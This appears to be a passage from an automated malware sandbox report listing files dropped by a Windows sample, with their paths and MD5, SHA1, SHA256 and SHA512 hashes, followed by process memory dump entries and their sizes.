23aead978c8efa77f68aaec6da07a83455d55bd981503efb6c9c95498321813e

SHA512
375c14c22be9ae66a459d33b670076889614f3073897a7c8da1874f0ccc91eff711b69fc2bac14f8602eff3f67a895f4565571e8f288abb3b3fcce14271e67bc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4qgwvi1q\CSC5A2DD784BD9D45A98611C5537A8A7859.TMP
MD5
ea535899391ce9d8616a881242fae1b4

SHA1
877be9c1e74bf2cecc223358e944eb8f96efcb35

SHA256
dcc959bdf4587a73912d7b272a481202d39ca268cf05d914fd7995a89d323ce5

SHA512
609d1e6a5a2ca7d03e92b806fc176c29abde2f4d3ce7051b1bf63b4ff8b0c0b92bcd66bae415e65b238c1501c8735bb27bc997d32d8c77695ff16ad183f0479a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zop2j04m\CSC1CF7842663148D6AD4940A97A63AE11.TMP
MD5
7501e65132906f5c5e0e5c0db3db1915

SHA1
c70c7c523a54fc2bdf3c0679409f4039c2119c92

SHA256
9715ddfc28f01049fbd55c573bf31a8d3ffae0598a1e2147026a017c5374397b

SHA512
4b83980c715dbb423ffbefd3f923284cae651412fb9e36f11a6d64619d214dbbb32cb6fec31efa2c784c084baf4cbcd30337f1edf9aed122640be6e75ebee6dc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zop2j04m\zop2j04m.0.cs
MD5
171a88ab4fad87acfd2e5032eb0c6113

SHA1
754de0e7656c558d335710fc41cbf196d39c1a19

SHA256
5473b5550a65171ee7d5977d673c97e41e9ec16fad10ec5ab8aa3b7c798577a6

SHA512
87ef6ac53a00d21f2df4d81ec5956861a4b539b10f5855345aa068c0d9d971f3329477e485471eb40b9eeea59f01fd3c42c4ab2f25e71d825cbf3586be0206b8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zop2j04m\zop2j04m.cmdline
MD5
763b35b76bfc8ae659da5095ed42d98a

SHA1
e451a7a9847739bb59c5c54439b7254f29287b14

SHA256
a461f368bddef81fddda3f0247b7a4e462827aaec3121ed66f251d11c02b3b3b

SHA512
42e3128b5287583a2a45de1832891ee40e3ccc2391656e315438f89d4fce048f429e40e8dd2654855b9d3bc6854bb077b80e192bebae9d56ced0047a5ed6724a

Download Submit
\Users\Admin\AppData\Local\cyzfc.dat
MD5
16bbc967a8b6a365871a05c74a4f345b

SHA1
9858d5cb2a6614be3c48e33911bf9f7978b441bf

SHA256
b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05

SHA512
68c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99

Download Submit
memory/504-9-0x0000000000000000-mapping.dmp

Download
memory/504-46-0x00000000778B2000-0x00000000778B200C-memory.dmp

Filesize
12B

Download
memory/504-47-0x0000000000000000-mapping.dmp

Download
memory/720-32-0x00000000778B2000-0x00000000778B200C-memory.dmp

Filesize
12B

Download
memory/720-34-0x0000000000000000-mapping.dmp

Download
memory/864-29-0x0000000000000000-mapping.dmp

Download
memory/864-6-0x0000000000000000-mapping.dmp

Download
memory/1452-17-0x0000000000000000-mapping.dmp

Download
memory/2004-50-0x0000000000000000-mapping.dmp

Download
memory/2004-49-0x00000000778B2000-0x00000000778B200C-memory.dmp

Filesize
12B

Download
memory/2820-31-0x0000000000000000-mapping.dmp

Download
memory/2820-30-0x00000000778B2000-0x00000000778B200C-memory.dmp

Filesize
12B

Download
memory/2912-14-0x0000000000000000-mapping.dmp

Download
memory/3224-22-0x0000000000000000-mapping.dmp

Download
memory/3280-28-0x0000023196660000-0x00000231966DE000-memory.dmp

Filesize
504KB

Download
memory/3280-27-0x0000023196620000-0x0000023196660000-memory.dmp

Filesize
256KB

Download
memory/3280-23-0x0000000000000000-mapping.dmp

Download
memory/3712-13-0x000001DA50540000-0x000001DA50541000-memory.dmp

Filesize
4KB

Download
memory/3712-2-0x0000000000000000-mapping.dmp

Download
memory/3712-4-0x000001DA357E0000-0x000001DA357E1000-memory.dmp

Filesize
4KB

Download
memory/3712-3-0x00007FFE217B0000-0x00007FFE2219C000-memory.dmp

Filesize
9.9MB

Download
memory/3712-5-0x000001DA505C0000-0x000001DA505C1000-memory.dmp

Filesize
4KB

Download
memory/3712-21-0x000001DA50550000-0x000001DA50551000-memory.dmp

Filesize
4KB

Download
memory/3804-38-0x00000000778B2000-0x00000000778B200C-memory.dmp

Filesize
12B

Download
memory/3804-39-0x0000000000000000-mapping.dmp

Download
memory/3948-44-0x0000000000000000-mapping.dmp

Download
memory/3948-43-0x00000000778B2000-0x00000000778B200C-memory.dmp

Filesize
12B

Download